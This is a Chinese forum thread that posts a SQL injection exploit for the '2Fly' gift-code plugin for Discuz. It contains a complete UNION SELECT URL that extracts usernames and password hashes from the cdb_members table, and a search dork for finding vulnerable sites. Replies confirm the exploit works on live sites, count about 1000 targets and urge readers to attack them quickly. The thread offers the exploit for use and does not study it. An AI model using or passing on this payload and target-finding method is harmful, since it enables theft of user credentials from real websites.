返回列表 发帖

Discuz账号发放插件注入0day

Discuz账号发放插件注入0day
插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:


http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php
上图:

希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

小柔 无图不真实  图片错误!!!!

TOP

靠了,图片犯盗

TOP

本帖最后由 cxy_hh 于 2009-8-16 23:27 编辑

DZ也会有这种漏洞?这些天一个色情联盟的DZ被邪八的人搞了,人家出5W来找邪八的那个人.唉我想搞那个联盟好久了,都没搞成!菜呀!不知他用什么搞的呢,会不会是这个呢?DZ太少暴洞了
试了几个确实是可以的,不过大多数都是报gameid参数错误,百度只找到了1000多个url,要搞的话赶紧的唷,呵呵,要不就被人拿光了,呵呵

TOP

返回列表